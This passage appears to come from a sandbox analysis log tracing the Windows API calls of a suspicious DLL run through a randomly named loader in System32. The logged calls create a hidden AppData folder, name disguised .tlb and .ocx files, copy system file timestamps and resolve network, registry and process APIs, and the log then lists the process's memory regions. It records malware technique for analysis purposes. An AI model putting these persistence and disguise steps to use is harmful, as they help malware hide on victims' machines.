(dwErrCode=0x0) [0033.330] GetLastError () returned 0x0 [0033.330] SetLastError (dwErrCode=0x0) [0033.330] GetLastError () returned 0x0 [0033.330] SetLastError (dwErrCode=0x0) [0033.330] GetLastError () returned 0x0 [0033.330] SetLastError (dwErrCode=0x0) [0033.330] GetLastError () returned 0x0 [0033.330] SetLastError (dwErrCode=0x0) [0033.330] GetLastError () returned 0x0 [0033.330] SetLastError (dwErrCode=0x0) [0033.330] GetLastError () returned 0x0 [0033.330] SetLastError (dwErrCode=0x0) [0033.330] GetLastError () returned 0x0 [0033.330] SetLastError (dwErrCode=0x0) [0033.330] GetLastError () returned 0x0 [0033.330] SetLastError (dwErrCode=0x0) [0033.330] GetLastError () returned 0x0 [0033.330] SetLastError (dwErrCode=0x0) [0033.330] GetLastError () returned 0x0 [0033.330] SetLastError (dwErrCode=0x0) [0033.330] GetLastError () returned 0x0 [0033.330] SetLastError (dwErrCode=0x0) [0033.330] GetLastError () returned 0x0 [0033.331] SetLastError (dwErrCode=0x0) [0033.331] GetLastError () returned 0x0 [0033.331] SetLastError (dwErrCode=0x0) [0033.331] GetLastError () returned 0x0 [0033.331] SetLastError (dwErrCode=0x0) [0033.331] GetLastError () returned 0x0 [0033.331] SetLastError (dwErrCode=0x0) [0033.331] GetLastError () returned 0x0 [0033.331] SetLastError (dwErrCode=0x0) [0033.331] GetLastError () returned 0x0 [0033.331] SetLastError (dwErrCode=0x0) [0033.331] GetLastError () returned 0x0 [0033.331] SetLastError (dwErrCode=0x0) [0033.331] GetLastError () returned 0x0 [0033.331] SetLastError (dwErrCode=0x0) [0033.331] GetLastError () returned 0x0 [0033.331] SetLastError (dwErrCode=0x0) [0033.331] GetLastError () returned 0x0 [0033.331] SetLastError (dwErrCode=0x0) [0033.331] GetLastError () returned 0x0 [0033.331] SetLastError (dwErrCode=0x0) [0033.331] GetLastError () returned 0x0 [0033.331] SetLastError (dwErrCode=0x0) [0033.331] GetLastError () returned 0x0 [0033.331] SetLastError (dwErrCode=0x0) [0033.331] GetLastError () returned 0x0 [0033.331] SetLastError (dwErrCode=0x0) [0033.331] GetLastError () returned 0x0 [0033.331] SetLastError (dwErrCode=0x0) [0033.331] GetLastError () returned 0x0 [0033.332] SetLastError (dwErrCode=0x0) [0033.332] GetLastError () returned 0x0 [0033.332] SetLastError (dwErrCode=0x0) [0033.332] GetLastError () returned 0x0 [0033.332] SetLastError (dwErrCode=0x0) [0033.332] GetLastError () returned 0x0 [0033.332] SetLastError (dwErrCode=0x0) [0033.332] GetLastError () returned 0x0 [0033.332] SetLastError (dwErrCode=0x0) [0033.332] GetLastError () returned 0x0 [0033.332] SetLastError (dwErrCode=0x0) [0033.332] GetLastError () returned 0x0 [0033.332] SetLastError (dwErrCode=0x0) [0033.332] GetLastError () returned 0x0 [0033.332] SetLastError (dwErrCode=0x0) [0033.332] GetLastError () returned 0x0 [0033.332] SetLastError (dwErrCode=0x0) [0033.332] GetLastError () returned 0x0 [0033.332] SetLastError (dwErrCode=0x0) [0033.332] GetLastError () returned 0x0 [0033.332] SetLastError (dwErrCode=0x0) [0033.332] GetLastError () returned 0x0 [0033.332] SetLastError (dwErrCode=0x0) [0033.332] GetLastError () returned 0x0 [0033.332] SetLastError (dwErrCode=0x0) [0033.332] GetLastError () returned 0x0 [0033.332] SetLastError (dwErrCode=0x0) [0033.332] GetLastError () returned 0x0 [0033.333] SetLastError (dwErrCode=0x0) [0033.333] GetLastError () returned 0x0 [0033.333] SetLastError (dwErrCode=0x0) [0033.333] GetLastError () returned 0x0 [0033.333] SetLastError (dwErrCode=0x0) [0033.333] GetLastError () returned 0x0 [0033.333] SetLastError (dwErrCode=0x0) [0033.333] GetLastError () returned 0x0 [0033.333] SetLastError (dwErrCode=0x0) [0033.333] GetLastError () returned 0x0 [0033.333] SetLastError (dwErrCode=0x0) [0033.333] GetLastError () returned 0x0 [0033.333] SetLastError (dwErrCode=0x0) [0033.333] GetLastError () returned 0x0 [0033.333] SetLastError (dwErrCode=0x0) [0033.333] GetLastError () returned 0x0 [0033.333] SetLastError (dwErrCode=0x0) [0033.333] GetLastError () returned 0x0 [0033.333] SetLastError (dwErrCode=0x0) [0033.333] GetLastError () returned 0x0 [0033.333] SetLastError (dwErrCode=0x0) [0033.333] GetLastError () returned 0x0 [0033.333] SetLastError (dwErrCode=0x0) [0033.333] GetLastError () returned 0x0 [0033.333] SetLastError (dwErrCode=0x0) [0033.333] GetLastError () returned 0x0 [0033.333] SetLastError (dwErrCode=0x0) [0033.333] GetLastError () returned 0x0 [0033.333] SetLastError (dwErrCode=0x0) [0033.334] GetLastError () returned 0x0 [0033.334] SetLastError (dwErrCode=0x0) [0033.334] GetLastError () returned 0x0 [0033.334] SetLastError (dwErrCode=0x0) [0033.334] GetLastError () returned 0x0 [0033.334] SetLastError (dwErrCode=0x0) [0033.334] GetLastError () returned 0x0 [0033.334] SetLastError (dwErrCode=0x0) [0033.334] GetLastError () returned 0x0 [0033.334] SetLastError (dwErrCode=0x0) [0033.334] GetLastError () returned 0x0 [0033.334] SetLastError (dwErrCode=0x0) [0033.334] GetLastError () returned 0x0 [0033.334] SetLastError (dwErrCode=0x0) [0033.334] GetLastError () returned 0x0 [0033.334] SetLastError (dwErrCode=0x0) [0033.334] GetLastError () returned 0x0 [0033.334] SetLastError (dwErrCode=0x0) [0033.334] GetLastError () returned 0x0 [0033.334] SetLastError (dwErrCode=0x0) [0033.334] GetLastError () returned 0x0 [0033.334] SetLastError (dwErrCode=0x0) [0033.334] GetLastError () returned 0x0 [0033.334] SetLastError (dwErrCode=0x0) [0033.334] GetLastError () returned 0x0 [0033.334] SetLastError (dwErrCode=0x0) [0033.334] GetLastError () returned 0x0 [0033.334] SetLastError (dwErrCode=0x0) [0033.334] GetLastError () returned 0x0 [0033.335] SetLastError (dwErrCode=0x0) [0033.335] GetLastError () returned 0x0 [0033.335] SetLastError (dwErrCode=0x0) [0033.335] GetLastError () returned 0x0 [0033.335] SetLastError (dwErrCode=0x0) [0033.335] GetLastError () returned 0x0 [0033.335] SetLastError (dwErrCode=0x0) [0033.335] GetLastError () returned 0x0 [0033.335] SetLastError (dwErrCode=0x0) [0033.335] GetLastError () returned 0x0 [0033.335] SetLastError (dwErrCode=0x0) [0033.335] GetLastError () returned 0x0 [0033.335] SetLastError (dwErrCode=0x0) [0033.335] GetLastError () returned 0x0 [0033.335] SetLastError (dwErrCode=0x0) [0033.335] GetLastError () returned 0x0 [0033.335] SetLastError (dwErrCode=0x0) [0033.335] GetLastError () returned 0x0 [0033.335] SetLastError (dwErrCode=0x0) [0033.335] GetLastError () returned 0x0 [0033.335] SetLastError (dwErrCode=0x0) [0033.335] GetLastError () returned 0x0 [0033.335] SetLastError (dwErrCode=0x0) [0033.335] GetLastError () returned 0x0 [0033.335] SetLastError (dwErrCode=0x0) [0033.335] GetLastError () returned 0x0 [0033.335] SetLastError (dwErrCode=0x0) [0033.335] GetLastError () returned 0x0 [0033.335] SetLastError (dwErrCode=0x0) [0033.335] GetLastError () returned 0x0 [0033.336] SetLastError (dwErrCode=0x0) [0033.336] GetLastError () returned 0x0 [0033.336] SetLastError (dwErrCode=0x0) [0033.336] GetLastError () returned 0x0 [0033.336] SetLastError (dwErrCode=0x0) [0033.336] GetLastError () returned 0x0 [0033.336] SetLastError (dwErrCode=0x0) [0033.336] GetLastError () returned 0x0 [0033.336] SetLastError (dwErrCode=0x0) [0033.336] GetLastError () returned 0x0 [0033.336] SetLastError (dwErrCode=0x0) [0033.343] GetModuleHandleA (lpModuleName="KERNEL32") returned 0x761d0000 [0033.343] GetProcAddress (hModule=0x761d0000, lpProcName="IsProcessorFeaturePresent") returned 0x762276b5 [0033.343] IsProcessorFeaturePresent (ProcessorFeature=0x0) returned 0 [0033.344] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x26f728 | out: lpSystemTimeAsFileTime=0x26f728*(dwLowDateTime=0xe18f62d0, dwHighDateTime=0x1d3dfba)) [0033.344] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x26f660, nSize=0x104 | out: lpFilename="C:\\Windows\\System32\\goRcteXxZX.exe" (normalized: "c:\\windows\\system32\\gorctexxzx.exe")) returned 0x22 [0033.344] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x26f548, nSize=0x104 | out: lpFilename="C:\\Windows\\System32\\goRcteXxZX.exe" (normalized: "c:\\windows\\system32\\gorctexxzx.exe")) returned 0x22 [0033.344] GetLastError () returned 0x0 [0033.344] GetLastError () returned 0x0 [0033.345] GetLastError () returned 0x0 [0033.345] GetLastError () returned 0x0 [0033.345] GetLastError () returned 0x0 [0033.345] GetLastError () returned 0x0 [0033.345] GetLastError () returned 0x0 [0033.345] GetLastError () returned 0x0 [0033.345] GetLastError () returned 0x0 [0033.345] GetLastError () returned 0x0 [0033.345] GetLastError () returned 0x0 [0033.345] GetLastError () returned 0x0 [0033.345] GetLastError () returned 0x0 [0033.345] GetLastError () returned 0x0 [0033.345] GetLastError () returned 0x0 [0033.345] GetLastError () returned 0x0 [0033.345] GetLastError () returned 0x0 [0033.345] GetLastError () returned 0x0 [0033.345] GetLastError () returned 0x0 [0033.345] GetSystemDirectoryA (in: lpBuffer=0x72f1e74c, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0033.345] wsprintfA (in: param_1=0x72f1e74c, param_2="%s\\" | out: param_1="C:\\Windows\\system32\\") returned 20 [0033.345] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x72f1e440, nSize=0x104 | out: lpFilename="C:\\Windows\\System32\\goRcteXxZX.exe" (normalized: "c:\\windows\\system32\\gorctexxzx.exe")) returned 0x22 [0033.345] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x72f1e134, nSize=0x104 | out: lpFilename="C:\\Windows\\System32\\goRcteXxZX.exe" (normalized: "c:\\windows\\system32\\gorctexxzx.exe")) returned 0x22 [0033.345] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x72f1e238, nSize=0x104 | out: lpFilename="C:\\Windows\\System32\\goRcteXxZX.exe" (normalized: "c:\\windows\\system32\\gorctexxzx.exe")) returned 0x22 [0033.345] GetEnvironmentVariableA (in: lpName="APPDATA", lpBuffer=0x72f1e648, nSize=0x104 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Roaming") returned 0x20 [0033.345] wsprintfA (in: param_1=0x72f1e648, param_2="%s\\%s" | out: param_1="C:\\Users\\EEBsYm5\\AppData\\Roaming\\HELP") returned 37 [0033.345] CreateDirectoryA (lpPathName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\HELP" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\help"), lpSecurityAttributes=0x0) returned 0 [0033.345] wsprintfA (in: param_1=0x72f1e648, param_2="%s\\%s\\" | out: param_1="C:\\Users\\EEBsYm5\\AppData\\Roaming\\HELP\\system32\\") returned 47 [0033.345] CreateDirectoryA (lpPathName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\HELP\\system32\\" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\help\\system32"), lpSecurityAttributes=0x0) returned 0 [0033.345] GetLastError () returned 0xb7 [0033.345] GetEnvironmentVariableA (in: lpName="APPDATA", lpBuffer=0x72f1e648, nSize=0x104 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Roaming") returned 0x20 [0033.345] wsprintfA (in: param_1=0x72f1e648, param_2="%s\\%s\\" | out: param_1="C:\\Users\\EEBsYm5\\AppData\\Roaming\\HELP\\") returned 38 [0033.345] wsprintfA (in: param_1=0x72f1e544, param_2="%s\\%s\\" | out: param_1="C:\\Users\\EEBsYm5\\AppData\\Roaming\\HELP\\\\system32\\") returned 48 [0033.345] GetTempPathA (in: nBufferLength=0x104, lpBuffer=0x72f1e954 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\") returned 0x24 [0033.346] wsprintfA (in: param_1=0x26f3c8, param_2="%s%s" | out: param_1="C:\\Windows\\system32\\win.com") returned 27 [0033.346] lstrlenA (lpString="C:\\Windows\\system32\\win.com") returned 27 [0033.346] wsprintfA (in: param_1=0x26f2c4, param_2="%s" | out: param_1="C:\\Windows\\system32\\win.com") returned 27 [0033.346] CreateFileA (lpFileName="C:\\Windows\\system32\\win.com" (normalized: "c:\\windows\\system32\\win.com"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x74 [0033.346] GetFileTime (in: hFile=0x74, lpCreationTime=0x72f1ec68, lpLastAccessTime=0x72f1ec70, lpLastWriteTime=0x72f1ec78 | out: lpCreationTime=0x72f1ec68*(dwLowDateTime=0x91a090ed, dwHighDateTime=0x1ca0410), lpLastAccessTime=0x72f1ec70*(dwLowDateTime=0x91a090ed, dwHighDateTime=0x1ca0410), lpLastWriteTime=0x72f1ec78*(dwLowDateTime=0x91a073c0, dwHighDateTime=0x1ca0410)) returned 1 [0033.346] CloseHandle (hObject=0x74) returned 1 [0033.346] GetLastError () returned 0x0 [0033.346] wsprintfA (in: param_1=0x72f1ea58, param_2="%s%s" | out: param_1="C:\\Users\\EEBsYm5\\AppData\\Roaming\\HELP\\\\system32\\msvcrtd.tlb") returned 59 [0033.346] GetLastError () returned 0x0 [0033.346] wsprintfA (in: param_1=0x72f1eb5c, param_2="%s%s" | out: param_1="C:\\Users\\EEBsYm5\\AppData\\Roaming\\HELP\\\\system32\\mskfp32.ocx") returned 59 [0033.346] GetSystemDirectoryA (in: lpBuffer=0x26f3c8, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0033.346] CreateFileA (lpFileName="C:\\Windows\\system32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x74 [0033.346] GetFileTime (in: hFile=0x74, lpCreationTime=0x72f2012c, lpLastAccessTime=0x72f20134, lpLastWriteTime=0x72f2013c | out: lpCreationTime=0x72f2012c*(dwLowDateTime=0x8afecd30, dwHighDateTime=0x1d2f57c), lpLastAccessTime=0x72f20134*(dwLowDateTime=0x8afecd30, dwHighDateTime=0x1d2f57c), lpLastWriteTime=0x72f2013c*(dwLowDateTime=0xe2a45800, dwHighDateTime=0x1cb887a)) returned 1 [0033.346] CloseHandle (hObject=0x74) returned 1 [0033.346] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x761d0000 [0033.347] GetProcAddress (hModule=0x761d0000, lpProcName="GetProcAddress") returned 0x762233d3 [0033.347] LoadLibraryA (lpLibFileName="ws2_32.dll") returned 0x77510000 [0033.348] LoadLibraryA (lpLibFileName="kernel32.dll") returned 0x761d0000 [0033.348] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76700000 [0033.348] LoadLibraryA (lpLibFileName="msvcrt.dll") returned 0x77720000 [0033.348] LoadLibraryA (lpLibFileName="user32.dll") returned 0x77ad0000 [0033.348] GetProcAddress (hModule=0x77510000, lpProcName="WSAStartup") returned 0x77513ab2 [0033.348] GetProcAddress (hModule=0x77510000, lpProcName="WSACleanup") returned 0x77513c5f [0033.348] GetProcAddress (hModule=0x77510000, lpProcName="gethostbyname") returned 0x77527673 [0033.348] GetProcAddress (hModule=0x77510000, lpProcName="inet_ntoa") returned 0x7751b131 [0033.348] GetProcAddress (hModule=0x761d0000, lpProcName="CreateFileA") returned 0x7621cee8 [0033.348] GetProcAddress (hModule=0x761d0000, lpProcName="WriteFile") returned 0x76221400 [0033.348] GetProcAddress (hModule=0x761d0000, lpProcName="CloseHandle") returned 0x7621ca7c [0033.348] GetProcAddress (hModule=0x761d0000, lpProcName="FindFirstFileA") returned 0x76222d89 [0033.348] GetProcAddress (hModule=0x761d0000, lpProcName="FindNextFileA") returned 0x7621a187 [0033.349] GetProcAddress (hModule=0x761d0000, lpProcName="FindClose") returned 0x76220e62 [0033.349] GetProcAddress (hModule=0x761d0000, lpProcName="DeleteFileA") returned 0x762147cb [0033.349] GetProcAddress (hModule=0x761d0000, lpProcName="FileTimeToSystemTime") returned 0x76221dfe [0033.349] GetProcAddress (hModule=0x761d0000, lpProcName="SetFilePointer") returned 0x7621db36 [0033.349] GetProcAddress (hModule=0x761d0000, lpProcName="CreateProcessA") returned 0x761d2082 [0033.349] GetProcAddress (hModule=0x761d0000, lpProcName="WaitForSingleObject") returned 0x7621ba90 [0033.349] GetProcAddress (hModule=0x761d0000, lpProcName="ReadFile") returned 0x762196fb [0033.349] GetProcAddress (hModule=0x761d0000, lpProcName="CreateEventW") returned 0x76223386 [0033.349] GetProcAddress (hModule=0x761d0000, lpProcName="GetSystemDirectoryA") returned 0x76218fc5 [0033.349] GetProcAddress (hModule=0x761d0000, lpProcName="GetWindowsDirectoryW") returned 0x762104b6 [0033.349] GetProcAddress (hModule=0x761d0000, lpProcName="GetTempPathA") returned 0x76236a65 [0033.349] GetProcAddress (hModule=0x761d0000, lpProcName="GetTempPathW") returned 0x76208b33 [0033.349] GetProcAddress (hModule=0x761d0000, lpProcName="GetLocalTime") returned 0x7621a90e [0033.349] GetProcAddress (hModule=0x761d0000, lpProcName="GetComputerNameW") returned 0x762103ff [0033.349] GetProcAddress (hModule=0x761d0000, lpProcName="GetSystemInfo") returned 0x76223728 [0033.349] GetProcAddress (hModule=0x761d0000, lpProcName="GetVersionExW") returned 0x76213b1a [0033.349] GetProcAddress (hModule=0x761d0000, lpProcName="GetEnvironmentVariableA") returned 0x7621ce2e [0033.349] GetProcAddress (hModule=0x761d0000, lpProcName="CopyFileA") returned 0x7623532c [0033.349] GetProcAddress (hModule=0x761d0000, lpProcName="GetLastError") returned 0x7621bf00 [0033.349] GetProcAddress (hModule=0x761d0000, lpProcName="SetFileAttributesA") returned 0x76208cb9 [0033.349] GetProcAddress (hModule=0x761d0000, lpProcName="GetFileSize") returned 0x76210273 [0033.350] GetProcAddress (hModule=0x761d0000, lpProcName="CreateDirectoryA") returned 0x762368da [0033.350] GetProcAddress (hModule=0x761d0000, lpProcName="TerminateProcess") returned 0x76212331 [0033.350] GetProcAddress (hModule=0x761d0000, lpProcName="LoadLibraryW") returned 0x76223c01 [0033.350] GetProcAddress (hModule=0x761d0000, lpProcName="GetProcAddress") returned 0x762233d3 [0033.350] GetProcAddress (hModule=0x761d0000, lpProcName="LoadLibraryA") returned 0x7622395c [0033.350] GetProcAddress (hModule=0x761d0000, lpProcName="MultiByteToWideChar") returned 0x7622452b [0033.350] GetProcAddress (hModule=0x76700000, lpProcName="RegCreateKeyExA") returned 0x76711469 [0033.350] GetProcAddress (hModule=0x76700000, lpProcName="RegEnumValueA") returned 0x7670cf49 [0033.350] GetProcAddress (hModule=0x76700000, lpProcName="RegDeleteValueA") returned 0x7672a4ea [0033.350] GetProcAddress (hModule=0x76700000, lpProcName="RegCloseKey") returned 0x7671469d [0033.350] GetProcAddress (hModule=0x77720000, lpProcName="memset") returned 0x77729790 [0033.350] GetProcAddress (hModule=0x77720000, lpProcName="memcpy") returned 0x77729910 [0033.350] GetProcAddress (hModule=0x77720000, lpProcName="memcmp") returned 0x77737975 [0033.350] GetProcAddress (hModule=0x77720000, lpProcName="malloc") returned 0x77729cee [0033.350] GetProcAddress (hModule=0x77720000, lpProcName="free") returned 0x77729894 [0033.350] GetProcAddress (hModule=0x77720000, lpProcName="strchr") returned 0x7772dbeb [0033.350] GetProcAddress (hModule=0x77720000, lpProcName="strncpy") returned 0x777308a9 [0033.350] GetProcAddress (hModule=0x77720000, lpProcName="atoi") returned 0x7772dbe0 [0033.350] GetProcAddress (hModule=0x77720000, lpProcName="_snwprintf") returned 0x777495d1 [0033.350] GetProcAddress (hModule=0x77720000, lpProcName="strncat") returned 0x77750909 [0033.350] GetProcAddress (hModule=0x77720000, lpProcName="strstr") returned 0x7772de4a [0033.350] GetProcAddress (hModule=0x77720000, lpProcName="strlen") returned 0x777343d3 [0033.351] GetProcAddress (hModule=0x77720000, lpProcName="strrchr") returned 0x7772dbae [0033.351] GetProcAddress (hModule=0x77720000, lpProcName="_snprintf") returned 0x7774fa7c [0033.351] GetProcAddress (hModule=0x77ad0000, lpProcName="OemToCharA") returned 0x77b2f041 [0033.351] GetProcAddress (hModule=0x77ad0000, lpProcName="wsprintfA") returned 0x77ae3f47 [0033.351] GetProcAddress (hModule=0x77ad0000, lpProcName="wsprintfW") returned 0x77af426d [0033.351] GetModuleFileNameA (in: hModule=0x72ee0000, lpFilename=0x72f1e134, nSize=0x104 | out: lpFilename="C:\\Users\\EEBsYm5\\Desktop\\97328F~1.DLL" (normalized: "c:\\users\\eebsym5\\desktop\\97328f~1.dll")) returned 0x25 [0033.351] GetModuleFileNameW (in: hModule=0x72ee0000, lpFilename=0x72f1e238, nSize=0x104 | out: lpFilename="C:\\Users\\EEBsYm5\\Desktop\\97328F~1.DLL" (normalized: "c:\\users\\eebsym5\\desktop\\97328f~1.dll")) returned 0x25 [0033.351] GetModuleFileNameA (in: hModule=0x72ee0000, lpFilename=0x72f1e440, nSize=0x104 | out: lpFilename="C:\\Users\\EEBsYm5\\Desktop\\97328F~1.DLL" (normalized: "c:\\users\\eebsym5\\desktop\\97328f~1.dll")) returned 0x25 [0033.351] OpenEventA (dwDesiredAccess=0x100000, bInheritHandle=0, lpName="97ryuhf023") returned 0x74 [0033.351] Entry () [0033.351] GetMessageA (lpMsg=0x26fa4c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0) Thread: id = 147 os_tid = 0xdd8 [0036.549] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x761d0000 [0036.549] GetProcAddress (hModule=0x761d0000, lpProcName="DecodePointer") returned 0x77f1cd10 [0036.549] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x761d0000 [0036.549] GetProcAddress (hModule=0x761d0000, lpProcName="DecodePointer") returned 0x77f1cd10 [0036.549] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x761d0000 [0036.549] GetProcAddress (hModule=0x761d0000, lpProcName="EncodePointer") returned 0x77f1a295 [0036.549] GetProcAddress (hModule=0x761d0000, lpProcName="DecodePointer") returned 0x77f1cd10 [0036.549] GetCurrentThreadId () returned 0xdd8 Process: id = "33" image_name = "gorctexxzx.exe" filename = "c:\\windows\\system32\\gorctexxzx.exe" page_root = "0x7ef4faa0" os_pid = "0xbf0" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0xa3c" cmd_line = "\"C:\\Windows\\System32\\goRcteXxZX.exe\" /dll=\"C:\\Users\\EEBsYm5\\Desktop\\97328F~1.DLL\" /fn_id=InstallW /fn_args=\"Install\"" cur_dir = "C:\\Windows\\system32\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000f0e7" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 1517 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 1518 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 1519 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 1520 start_va = 0x1b0000 end_va = 0x2affff entry_point = 0x0 region_type = private name = "private_0x00000000001b0000" filename = "" Region: id = 1521 start_va = 0x11d0000 end_va = 0x11f0fff entry_point = 0x11d0000 region_type = mapped_file name = "gorctexxzx.exe" filename = "\\Windows\\System32\\goRcteXxZX.exe" (normalized: "c:\\windows\\system32\\gorctexxzx.exe") Region: id = 1522 start_va = 0x77e80000 end_va = 0x77e80fff entry_point = 0x77e80000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 1523 start_va = 0x77ec0000 end_va = 0x77ffbfff entry_point = 0x77ec0000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 1524 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 1525 start_va = 0x7ffde000 end_va = 0x7ffdefff entry_point = 0x0 region_type = private name = "private_0x000000007ffde000" filename = "" Region: id = 1526 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 1527 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 1528 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 1529 start_va = 0x3a0000 end_va = 0x49ffff entry_point = 0x0 region_type = private name = "private_0x00000000003a0000" filename = "" Region: id = 1530 start_va = 0x5e0000 end_va = 0x5effff entry_point = 0x0 region_type = private name = "private_0x00000000005e0000" filename = "" Region: id = 1531 start_va = 0x75f70000 end_va = 0x75fb9fff entry_point = 0x75f70000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 1532 start_va = 0x761d0000 end_va = 0x762a3fff entry_point = 0x761d0000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 1533 start_va = 0x76300000 end_va = 0x76356fff entry_point = 0x76300000 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\System32\\shlwapi.dll" (normalized: "c:\\windows\\system32\\shlwapi.dll") Region: id = 1534 start_va = 0x765f0000 end_va = 0x765f9fff entry_point = 0x765f0000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 1535 start_va = 0x767a0000 end_va = 0x773e9fff entry_point = 0x767a0000 region_type = mapped_file name = "shell32.dll" filename = "\\Windows\\System32\\shell32.dll" (normalized: "c:\\windows\\system32\\shell32.dll") Region: id = 1536 start_va = 0x773f0000 end_va = 0x7748cfff entry_point = 0x773f0000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 1537 start_va = 0x77550000 end_va = 0x775f0fff entry_point = 0x77550000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 1538 start_va = 0x77720000 end_va = 0x777cbfff entry_point = 0x77720000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 1539 start_va = 0x77970000 end_va = 0x77acbfff entry_point = 0x77970000 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll") Region: id = 1540 start_va = 0x77ad0000 end_va = 0x77b98fff entry_point = 0x77ad0000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 1541 start_va = 0x77c80000 end_va = 0x77ccdfff entry_point = 0x77c80000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 1542 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 1543 start_va = 0xc0000 end_va = 0x187fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000c0000" filename = "" Region: id = 1544 start_va = 0x762b0000 end_va = 0x762cefff entry_point = 0x762b0000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 1545 start_va = 0x77ba0000 end_va = 0x77c6bfff entry_point = 0x77ba0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 1546 start_va = 0x20000 end_va = 0x20fff entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 1547 start_va = 0x190000 end_va = 0x190fff entry_point = 0x0 region_type = private name = "private_0x0000000000190000" filename = "" Region: id = 1548 start_va = 0x4a0000 end_va = 0x5a0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004a0000" filename = "" Region: id = 1549 start_va = 0x1200000 end_va = 0x1dfffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001200000" filename = "" Region: id = 1550 start_va = 0x72db0000 end_va = 0x72db2fff entry_point = 0x72db0000 region_type = mapped_file name = "api-ms-win-core-synch-l1-2-0.dll" filename = 